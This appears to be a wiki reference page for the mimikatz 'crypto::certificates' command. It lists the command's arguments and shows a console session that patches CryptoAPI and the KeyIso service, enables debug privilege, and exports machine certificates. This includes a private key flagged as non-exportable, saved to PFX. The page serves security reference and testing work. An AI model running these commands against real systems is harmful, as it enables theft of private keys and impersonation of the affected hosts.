certificates
crypto::certificates lists or exports certificates. It has the following command line arguments:
  • /systemstore: the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER)
  • /store: the store that must be used to list/export certificates (default: My) - full list with crypto::stores
  • /export: export all certificates to files (public parts in DER, private parts in PFX files - password protected with: mimikatz)
  • /silent: if user interaction is required, then abort
  • /nokey: do not try to interact with the private key
1
mimikatz # crypto::capi
2
Local CryptoAPI patched
3
​
4
mimikatz # privilege::debug
5
Privilege '20' OK
6
​
7
mimikatz # crypto::cng
8
"KeyIso" service patched
9
​
10
mimikatz # crypto::certificates /systemstore:local_machine /store:my /export
11
* System Store : 'local_machine' (0x00020000)
12
* Store : 'my'
13
​
14
0. example.domain.local
15
Key Container : example.domain.local
16
Provider : Microsoft Software Key Storage Provider
17
Type : CNG Key (0xffffffff)
18
Exportable key : NO
19
Key size : 2048
20
Public export : OK - 'local_machine_my_0_example.domain.local.der'
21
Private export : OK - 'local_machine_my_0_example.domain.local.pfx'
Copied!
Last modified 6mo ago
Copy link